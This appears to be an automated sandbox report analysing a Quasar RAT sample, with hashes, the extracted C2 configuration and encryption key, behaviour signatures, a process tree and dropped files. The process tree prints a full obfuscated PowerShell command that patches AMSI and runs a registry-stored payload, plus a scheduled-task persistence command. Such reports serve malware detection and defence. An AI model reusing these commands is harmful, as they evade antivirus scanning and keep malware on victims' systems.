Analysis

  • max time kernel
    1800s
  • max time network
    1800s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240508-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
  • submitted
    10-05-2024 06:54

General

  • Target

    R0X-Built.exe

  • Size

    409KB

  • MD5

    6755a8034c245ebe11816c1e80286929

  • SHA1

    b620053be1ac5845f10cec36a1072ed6b6e116f8

  • SHA256

    b26ec4d47dac00d294fe2b327c0f02d6b9c3ba14819ace77d972557640f1105e

  • SHA512

    96307fd18ab07df983d3c05c8354a0414888a01bea0a2d80d68a42ee6e8275acceaae3b709d9684a8b8945e8cbbff5eb71907d5eb329c8d9074c29f6d66ca7b8

  • SSDEEP

    12288:3piREGJfR9EqRg//vo3s6z06l/ao7nhvum9Aq:ZwpJdNFCo7hR

Malware Config

Extracted

Family

quasar

Version

3.1.5

Botnet

Slave

C2

looking-memphis.gl.at.ply.gg:45119

Mutex

$Sxr-3vDee7FzoJnhqjuE3n

Attributes
  • encryption_key

    bjv1MgUogo1kl6Tra7jd

  • install_name

    $srr-powershell.exe

  • log_directory

    Logs

  • reconnect_delay

    1000

  • startup_key

    $srr-powershell

  • subdirectory

    Windows

Signatures

  • Quasar RAT

    Quasar is an open source Remote Access Tool.

  • Quasar payload 2 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • Downloads MZ/PE file
  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Executes dropped EXE 2 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 13 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Checks SCSI registry key(s) 3 TTPs 18 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Enumerates system info in registry 2 TTPs 1 IoCs
  • Modifies data under HKEY_USERS 56 IoCs
  • Modifies registry class 12 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of UnmapMainImage 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\system32\winlogon.exe
    winlogon.exe
    1⤵
      PID:616
      • C:\Windows\system32\dwm.exe
        "dwm.exe"
        2⤵
          PID:380
        • C:\Windows\System32\dllhost.exe
          C:\Windows\System32\dllhost.exe /Processid:{aa6a2fff-e776-4253-ad14-81c12e464151}
          2⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:5068
      • C:\Windows\system32\lsass.exe
        C:\Windows\system32\lsass.exe
        1⤵
          PID:676
        • C:\Windows\system32\svchost.exe
          C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
          1⤵
            PID:960
          • C:\Windows\system32\svchost.exe
            C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
            1⤵
              PID:692
            • C:\Windows\System32\svchost.exe
              C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
              1⤵
                PID:1032
              • C:\Windows\System32\svchost.exe
                C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
                1⤵
                  PID:1112
                • C:\Windows\system32\svchost.exe
                  C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
                  1⤵
                    PID:1136
                  • C:\Windows\system32\svchost.exe
                    C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
                    1⤵
                      PID:1148
                      • C:\Windows\system32\taskhostw.exe
                        taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
                        2⤵
                          PID:2928
                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                          C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:NRwEseiiwFfr{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$zCUfGPfowbqkHp,[Parameter(Position=1)][Type]$CaPsjtlTft)$JZKaaSmrtUY=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('R'+'e'+'f'+[Char](108)+''+'e'+'c'+'t'+''+[Char](101)+''+'d'+'D'+[Char](101)+''+[Char](108)+''+[Char](101)+''+[Char](103)+''+'a'+''+'t'+''+'e'+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+[Char](110)+'M'+[Char](101)+''+'m'+'o'+[Char](114)+''+[Char](121)+''+'M'+''+'o'+''+[Char](100)+'u'+'l'+''+[Char](101)+'',$False).DefineType(''+[Char](77)+'y'+'D'+'e'+[Char](108)+'e'+[Char](103)+''+'a'+''+[Char](116)+'e'+[Char](84)+'y'+[Char](112)+''+[Char](101)+'',''+[Char](67)+''+[Char](108)+''+[Char](97)+'s'+[Char](115)+''+[Char](44)+''+'P'+''+[Char](117)+''+'b'+''+'l'+''+[Char](105)+''+[Char](99)+','+'S'+''+'e'+''+[Char](97)+''+[Char](108)+''+[Char](101)+'d'+[Char](44)+'A'+[Char](110)+''+[Char](115)+''+'i'+''+[Char](67)+''+'l'+''+'a'+'s'+[Char](115)+','+'A'+'u'+[Char](116)+''+[Char](111)+''+[Char](67)+''+[Char](108)+''+[Char](97)+''+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$JZKaaSmrtUY.DefineConstructor(''+'R'+'TS'+[Char](112)+''+[Char](101)+''+'c'+'ial'+[Char](78)+''+[Char](97)+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+[Char](72)+''+[Char](105)+''+'d'+''+[Char](101)+''+'B'+''+[Char](121)+''+[Char](83)+'i'+[Char](103)+''+[Char](44)+'P'+[Char](117)+''+[Char](98)+''+[Char](108)+''+[Char](105)+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$zCUfGPfowbqkHp).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+'n'+''+'t'+'i'+[Char](109)+''+[Char](101)+''+[Char](44)+'M'+[Char](97)+''+'n'+''+'a'+''+[Char](103)+''+[Char](101)+''+[Char](100)+'');$JZKaaSmrtUY.DefineMethod(''+'I'+''+[Char](110)+''+[Char](118)+''+[Char](111)+''+[Char](107)+'e',''+[Char](80)+'ub'+'l'+''+[Char](105)+'c,'+'H'+''+'i'+''+[Char](100)+'eB'+[Char](121)+''+[Char](83)+''+[Char](105)+''+'g'+''+[Char](44)+''+[Char](78)+'e'+'w'+''+'S'+'l'+[Char](111)+''+'t'+''+[Char](44)+'V'+[Char](105)+''+[Char](114)+'t'+[Char](117)+''+[Char](97)+'l',$CaPsjtlTft,$zCUfGPfowbqkHp).SetImplementationFlags(''+'R'+''+'u'+''+[Char](110)+'t'+[Char](105)+''+'m'+'e,'+'M'+''+[Char](97)+''+[Char](110)+''+[Char](97)+''+[Char](103)+''+'e'+''+'d'+'');Write-Output $JZKaaSmrtUY.CreateType();}$kTyhjhRMHEAIB=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('S'+'y'+''+[Char](115)+'t'+'e'+''+[Char](109)+''+[Char](46)+''+[Char](100)+'l'+[Char](108)+'')}).GetType(''+[Char](77)+''+'i'+'c'+[Char](114)+''+'o'+''+[Char](115)+'o'+[Char](102)+''+[Char](116)+''+'.'+''+'W'+''+'i'+''+'n'+''+'3'+''+'2'+''+[Char](46)+''+[Char](85)+''+[Char](110)+'s'+[Char](97)+'f'+'e'+''+[Char](78)+'a'+[Char](116)+''+[Char](105)+''+'v'+''+[Char](101)+''+'M'+'e'+[Char](116)+''+'h'+'o'+[Char](100)+''+[Char](115)+'');$swEecgTnlCzAKW=$kTyhjhRMHEAIB.GetMethod(''+'G'+'e'+[Char](116)+''+[Char](80)+''+[Char](114)+''+'o'+'c'+[Char](65)+''+[Char](100)+''+[Char](100)+''+[Char](114)+''+[Char](101)+''+'s'+'s',[Reflection.BindingFlags](''+'P'+''+'u'+''+'b'+''+[Char](108)+''+[Char](105)+''+'c'+','+[Char](83)+''+[Char](116)+''+[Char](97)+''+[Char](116)+''+'i'+''+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$XWecTLCmwEJAeMFTKZb=NRwEseiiwFfr @([String])([IntPtr]);$XFhAskxyexiCQdQNEewAFR=NRwEseiiwFfr @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$IiqhLoZjkfX=$kTyhjhRMHEAIB.GetMethod(''+[Char](71)+''+[Char](101)+'t'+[Char](77)+''+[Char](111)+''+[Char](100)+''+[Char](117)+'l'+'e'+''+[Char](72)+''+[Char](97)+''+[Char](110)+'d'+[Char](108)+''+[Char](101)+'').Invoke($Null,@([Object](''+[Char](107)+''+[Char](101)+''+'r'+''+[Char](110)+''+[Char](101)+''+[Char](108)+''+[Char](51)+''+[Char](50)+''+[Char](46)+'dll')));$FpJlYomYZYdLYj=$swEecgTnlCzAKW.Invoke($Null,@([Object]$IiqhLoZjkfX,[Object]('L'+[Char](111)+'a'+'d'+''+'L'+'i'+'b'+''+'r'+'a'+'r'+''+'y'+'A')));$FvNDHxEinxvDGBnJT=$swEecgTnlCzAKW.Invoke($Null,@([Object]$IiqhLoZjkfX,[Object](''+'V'+''+[Char](105)+''+'r'+''+[Char](116)+'ualPro'+[Char](116)+''+[Char](101)+''+[Char](99)+''+'t'+'')));$zUiVcgH=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($FpJlYomYZYdLYj,$XWecTLCmwEJAeMFTKZb).Invoke(''+[Char](97)+''+'m'+''+'s'+''+[Char](105)+''+[Char](46)+''+'d'+''+[Char](108)+''+'l'+'');$WXsSmrMAYgpPBQiaQ=$swEecgTnlCzAKW.Invoke($Null,@([Object]$zUiVcgH,[Object](''+[Char](65)+''+[Char](109)+''+[Char](115)+'i'+'S'+''+'c'+''+[Char](97)+''+[Char](110)+''+[Char](66)+'u'+[Char](102)+'f'+[Char](101)+''+[Char](114)+'')));$EghHSOALJm=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($FvNDHxEinxvDGBnJT,$XFhAskxyexiCQdQNEewAFR).Invoke($WXsSmrMAYgpPBQiaQ,[uint32]8,4,[ref]$EghHSOALJm);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$WXsSmrMAYgpPBQiaQ,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($FvNDHxEinxvDGBnJT,$XFhAskxyexiCQdQNEewAFR).Invoke($WXsSmrMAYgpPBQiaQ,[uint32]8,0x20,[ref]$EghHSOALJm);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+'O'+''+[Char](70)+''+[Char](84)+''+[Char](87)+''+'A'+''+[Char](82)+''+[Char](69)+'').GetValue(''+[Char](36)+'77'+'s'+'t'+'a'+''+'g'+''+[Char](101)+''+'r'+'')).EntryPoint.Invoke($Null,$Null)"
                          2⤵
                          • Suspicious use of NtCreateUserProcessOtherParentProcess
                          • Drops file in System32 directory
                          • Suspicious use of SetThreadContext
                          • Modifies data under HKEY_USERS
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of AdjustPrivilegeToken
                          • Suspicious use of WriteProcessMemory
                          PID:1792
                      • C:\Windows\System32\svchost.exe
                        C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
                        1⤵
                        • Drops file in System32 directory
                        PID:1252
                      • C:\Windows\system32\svchost.exe
                        C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
                        1⤵
                          PID:1264
                        • C:\Windows\system32\svchost.exe
                          C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
                          1⤵
                            PID:1324
                          • C:\Windows\system32\svchost.exe
                            C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
                            1⤵
                              PID:1368
                            • C:\Windows\system32\svchost.exe
                              C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
                              1⤵
                                PID:1420
                                • C:\Windows\system32\sihost.exe
                                  sihost.exe
                                  2⤵
                                  • Modifies registry class
                                  PID:2656
                              • C:\Windows\system32\svchost.exe
                                C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
                                1⤵
                                  PID:1484
                                • C:\Windows\system32\svchost.exe
                                  C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
                                  1⤵
                                    PID:1540
                                  • C:\Windows\System32\svchost.exe
                                    C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
                                    1⤵
                                      PID:1556
                                    • C:\Windows\system32\svchost.exe
                                      C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
                                      1⤵
                                        PID:1652
                                      • C:\Windows\System32\svchost.exe
                                        C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
                                        1⤵
                                          PID:1700
                                        • C:\Windows\System32\svchost.exe
                                          C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
                                          1⤵
                                            PID:1728
                                          • C:\Windows\System32\svchost.exe
                                            C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
                                            1⤵
                                              PID:1804
                                            • C:\Windows\System32\svchost.exe
                                              C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                              1⤵
                                                PID:1820
                                              • C:\Windows\System32\svchost.exe
                                                C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                                1⤵
                                                  PID:1940
                                                • C:\Windows\system32\svchost.exe
                                                  C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
                                                  1⤵
                                                    PID:1948
                                                  • C:\Windows\system32\svchost.exe
                                                    C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
                                                    1⤵
                                                      PID:1956
                                                    • C:\Windows\System32\svchost.exe
                                                      C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
                                                      1⤵
                                                        PID:1052
                                                      • C:\Windows\system32\svchost.exe
                                                        C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
                                                        1⤵
                                                        • Suspicious use of AdjustPrivilegeToken
                                                        PID:1720
                                                      • C:\Windows\System32\spoolsv.exe
                                                        C:\Windows\System32\spoolsv.exe
                                                        1⤵
                                                          PID:2112
                                                        • C:\Windows\System32\svchost.exe
                                                          C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
                                                          1⤵
                                                            PID:2228
                                                          • C:\Windows\System32\svchost.exe
                                                            C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
                                                            1⤵
                                                              PID:2308
                                                            • C:\Windows\system32\svchost.exe
                                                              C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
                                                              1⤵
                                                                PID:2456
                                                              • C:\Windows\system32\svchost.exe
                                                                C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
                                                                1⤵
                                                                  PID:2464
                                                                • C:\Windows\system32\svchost.exe
                                                                  C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
                                                                  1⤵
                                                                    PID:2672
                                                                  • C:\Windows\system32\svchost.exe
                                                                    C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
                                                                    1⤵
                                                                    • Drops file in System32 directory
                                                                    PID:2708
                                                                  • C:\Windows\sysmon.exe
                                                                    C:\Windows\sysmon.exe
                                                                    1⤵
                                                                      PID:2788
                                                                    • C:\Windows\system32\svchost.exe
                                                                      C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
                                                                      1⤵
                                                                        PID:2796
                                                                      • C:\Windows\System32\svchost.exe
                                                                        C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
                                                                        1⤵
                                                                          PID:2880
                                                                        • C:\Windows\system32\svchost.exe
                                                                          C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
                                                                          1⤵
                                                                            PID:2888
                                                                          • C:\Windows\system32\svchost.exe
                                                                            C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker
                                                                            1⤵
                                                                              PID:2224
                                                                            • C:\Windows\system32\wbem\unsecapp.exe
                                                                              C:\Windows\system32\wbem\unsecapp.exe -Embedding
                                                                              1⤵
                                                                                PID:2960
                                                                              • C:\Windows\system32\svchost.exe
                                                                                C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
                                                                                1⤵
                                                                                  PID:3456
                                                                                • C:\Windows\Explorer.EXE
                                                                                  C:\Windows\Explorer.EXE
                                                                                  1⤵
                                                                                  • Modifies registry class
                                                                                  • Suspicious behavior: GetForegroundWindowSpam
                                                                                  • Suspicious use of UnmapMainImage
                                                                                  PID:3532
                                                                                  • C:\Users\Admin\AppData\Local\Temp\R0X-Built.exe
                                                                                    "C:\Users\Admin\AppData\Local\Temp\R0X-Built.exe"
                                                                                    2⤵
                                                                                    • Drops file in System32 directory
                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                    • Suspicious use of WriteProcessMemory
                                                                                    PID:540
                                                                                    • C:\Windows\SysWOW64\Windows\$srr-powershell.exe
                                                                                      "C:\Windows\SysWOW64\Windows\$srr-powershell.exe"
                                                                                      3⤵
                                                                                      • Executes dropped EXE
                                                                                      • Drops file in System32 directory
                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                      PID:4136
                                                                                    • C:\Users\Admin\AppData\Local\Temp\install.exe
                                                                                      "C:\Users\Admin\AppData\Local\Temp\install.exe"
                                                                                      3⤵
                                                                                      • Executes dropped EXE
                                                                                      PID:1636
                                                                                    • C:\Windows\SysWOW64\SCHTASKS.exe
                                                                                      "SCHTASKS.exe" /create /tn "$77R0X-Built.exe" /tr "'C:\Users\Admin\AppData\Local\Temp\R0X-Built.exe'" /sc onlogon /rl HIGHEST
                                                                                      3⤵
                                                                                      • Creates scheduled task(s)
                                                                                      PID:4004
                                                                                • C:\Windows\system32\svchost.exe
                                                                                  C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
                                                                                  1⤵
                                                                                    PID:3644
                                                                                  • C:\Windows\system32\DllHost.exe
                                                                                    C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
                                                                                    1⤵
                                                                                      PID:3860
                                                                                    • C:\Windows\System32\RuntimeBroker.exe
                                                                                      C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                      1⤵
                                                                                      • Modifies registry class
                                                                                      PID:4012
                                                                                    • C:\Windows\System32\RuntimeBroker.exe
                                                                                      C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                      1⤵
                                                                                        PID:4232
                                                                                      • C:\Windows\System32\RuntimeBroker.exe
                                                                                        C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                        1⤵
                                                                                          PID:4780
                                                                                        • C:\Windows\system32\svchost.exe
                                                                                          C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
                                                                                          1⤵
                                                                                            PID:5020
                                                                                          • C:\Windows\System32\svchost.exe
                                                                                            C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
                                                                                            1⤵
                                                                                              PID:4848
                                                                                            • C:\Windows\system32\svchost.exe
                                                                                              C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
                                                                                              1⤵
                                                                                                PID:1072
                                                                                              • C:\Windows\system32\svchost.exe
                                                                                                C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
                                                                                                1⤵
                                                                                                • Modifies data under HKEY_USERS
                                                                                                PID:3164
                                                                                              • C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
                                                                                                "C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
                                                                                                1⤵
                                                                                                • Modifies data under HKEY_USERS
                                                                                                PID:1836
                                                                                              • C:\Windows\system32\SppExtComObj.exe
                                                                                                C:\Windows\system32\SppExtComObj.exe -Embedding
                                                                                                1⤵
                                                                                                  PID:1592
                                                                                                • C:\Windows\System32\svchost.exe
                                                                                                  C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
                                                                                                  1⤵
                                                                                                    PID:1840
                                                                                                  • C:\Windows\system32\DllHost.exe
                                                                                                    C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
                                                                                                    1⤵
                                                                                                    • Drops file in System32 directory
                                                                                                    PID:4064
                                                                                                  • C:\Windows\System32\RuntimeBroker.exe
                                                                                                    C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                    1⤵
                                                                                                      PID:4824
                                                                                                    • C:\Windows\System32\RuntimeBroker.exe
                                                                                                      C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                      1⤵
                                                                                                      • Modifies registry class
                                                                                                      PID:1096
                                                                                                    • C:\Windows\system32\wbem\wmiprvse.exe
                                                                                                      C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                      1⤵
                                                                                                      • Checks BIOS information in registry
                                                                                                      • Checks SCSI registry key(s)
                                                                                                      • Enumerates system info in registry
                                                                                                      PID:1056
                                                                                                    • C:\Windows\system32\backgroundTaskHost.exe
                                                                                                      "C:\Windows\system32\backgroundTaskHost.exe" -ServerName:ShellFeedsUI.AppXnj65k2d1a1rnztt2t2nng5ctmk3e76pn.mca
                                                                                                      1⤵
                                                                                                        PID:4264
                                                                                                      • C:\Windows\System32\RuntimeBroker.exe
                                                                                                        C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                        1⤵
                                                                                                          PID:2684
                                                                                                        • C:\Windows\System32\RuntimeBroker.exe
                                                                                                          C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                          1⤵
                                                                                                          • Modifies registry class
                                                                                                          PID:3728
                                                                                                        • C:\Windows\System32\RuntimeBroker.exe
                                                                                                          C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                          1⤵
                                                                                                            PID:2124
                                                                                                          • C:\Windows\system32\DllHost.exe
                                                                                                            C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
                                                                                                            1⤵
                                                                                                              PID:1908
                                                                                                            • C:\Windows\System32\RuntimeBroker.exe
                                                                                                              C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                              1⤵
                                                                                                                PID:2188
                                                                                                              • C:\Windows\System32\RuntimeBroker.exe
                                                                                                                C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                                1⤵
                                                                                                                  PID:1628

                                                                                                                Network

                                                                                                                MITRE ATT&CK Enterprise v15

                                                                                                                Replay Monitor

                                                                                                                Loading Replay Monitor...

                                                                                                                Downloads

                                                                                                                • C:\Users\Admin\AppData\Local\Temp\install.exe
                                                                                                                  Filesize

                                                                                                                  162KB

                                                                                                                  MD5

                                                                                                                  152e3f07bbaf88fb8b097ba05a60df6e

                                                                                                                  SHA1

                                                                                                                  c4638921bb140e7b6a722d7c4d88afa7ed4e55c8

                                                                                                                  SHA256

                                                                                                                  a4623b34f8d09f536e6d8e2f06f6edfb3975938eb0d9927e6cd2ff9c553468fc

                                                                                                                  SHA512

                                                                                                                  2fcc3136e161e89a123f9ff8447afc21d090afdb075f084439b295988214d4b8e918be7eff47ffeec17a4a47ad5a49195b69e2465f239ee03d961a655ed51cd4

                                                                                                                • C:\Windows\SysWOW64\Windows\$srr-powershell.exe
                                                                                                                  Filesize

                                                                                                                  409KB

                                                                                                                  MD5

                                                                                                                  6755a8034c245ebe11816c1e80286929

                                                                                                                  SHA1

                                                                                                                  b620053be1ac5845f10cec36a1072ed6b6e116f8

                                                                                                                  SHA256

                                                                                                                  b26ec4d47dac00d294fe2b327c0f02d6b9c3ba14819ace77d972557640f1105e

                                                                                                                  SHA512

                                                                                                                  96307fd18ab07df983d3c05c8354a0414888a01bea0a2d80d68a42ee6e8275acceaae3b709d9684a8b8945e8cbbff5eb71907d5eb329c8d9074c29f6d66ca7b8

                                                                                                                • C:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749
                                                                                                                  Filesize

                                                                                                                  330B

                                                                                                                  MD5

                                                                                                                  e3517efb15c1f0c93f7510b1efa50eeb

                                                                                                                  SHA1

                                                                                                                  179cd2edef9758b46497bfb3f099cc34b671356a

                                                                                                                  SHA256

                                                                                                                  6652fbdf8e2afcd26ba398efe2e7220ce51259db72a98331016546cfca8d313a

                                                                                                                  SHA512

                                                                                                                  4aff6e2bcbe9841d0288b781f39704bb8b8f7015f14fb19a099085e32e583362e4c0395fb7289b0cd90aa4143c79e582acdff9db9bbc7e1671f0b34cb7492573

                                                                                                                • C:\Windows\Temp\__PSScriptPolicyTest_rtgscl3h.wc1.ps1
                                                                                                                  Filesize

                                                                                                                  60B

                                                                                                                  MD5

                                                                                                                  d17fe0a3f47be24a6453e9ef58c94641

                                                                                                                  SHA1

                                                                                                                  6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                                                                                                  SHA256

                                                                                                                  96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                                                                                                  SHA512

                                                                                                                  5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                                                                                                • memory/380-89-0x00007FFEC8050000-0x00007FFEC8060000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  64KB

                                                                                                                • memory/380-82-0x000002018CA40000-0x000002018CA6B000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  172KB

                                                                                                                • memory/380-88-0x000002018CA40000-0x000002018CA6B000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  172KB

                                                                                                                • memory/540-2-0x00000000056E0000-0x0000000005C84000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  5.6MB

                                                                                                                • memory/540-6-0x0000000005ED0000-0x0000000005EE2000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  72KB

                                                                                                                • memory/540-1-0x0000000000730000-0x000000000079C000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  432KB

                                                                                                                • memory/540-5-0x0000000005270000-0x00000000052D6000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  408KB

                                                                                                                • memory/540-3-0x00000000051D0000-0x0000000005262000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  584KB

                                                                                                                • memory/540-20-0x0000000074710000-0x0000000074EC0000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  7.7MB

                                                                                                                • memory/540-0-0x000000007471E000-0x000000007471F000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  4KB

                                                                                                                • memory/540-4-0x0000000074710000-0x0000000074EC0000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  7.7MB

                                                                                                                • memory/540-7-0x0000000006410000-0x000000000644C000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  240KB

                                                                                                                • memory/616-48-0x000001B747050000-0x000001B74707B000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  172KB

                                                                                                                • memory/616-56-0x00007FFEC8050000-0x00007FFEC8060000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  64KB

                                                                                                                • memory/616-49-0x000001B747050000-0x000001B74707B000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  172KB

                                                                                                                • memory/616-47-0x000001B747020000-0x000001B747045000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  148KB

                                                                                                                • memory/616-55-0x000001B747050000-0x000001B74707B000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  172KB

                                                                                                                • memory/676-60-0x000001708BF20000-0x000001708BF4B000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  172KB

                                                                                                                • memory/676-67-0x00007FFEC8050000-0x00007FFEC8060000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  64KB

                                                                                                                • memory/676-66-0x000001708BF20000-0x000001708BF4B000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  172KB

                                                                                                                • memory/692-93-0x000002624F4E0000-0x000002624F50B000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  172KB

                                                                                                                • memory/960-78-0x00007FFEC8050000-0x00007FFEC8060000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  64KB

                                                                                                                • memory/960-71-0x000001C13EE10000-0x000001C13EE3B000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  172KB

                                                                                                                • memory/960-77-0x000001C13EE10000-0x000001C13EE3B000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  172KB

                                                                                                                • memory/1792-31-0x000001CDF5510000-0x000001CDF553A000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  168KB

                                                                                                                • memory/1792-30-0x000001CDF5120000-0x000001CDF5142000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  136KB

                                                                                                                • memory/1792-33-0x00007FFF06EC0000-0x00007FFF06F7E000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  760KB

                                                                                                                • memory/1792-32-0x00007FFF07FD0000-0x00007FFF081C5000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  2.0MB

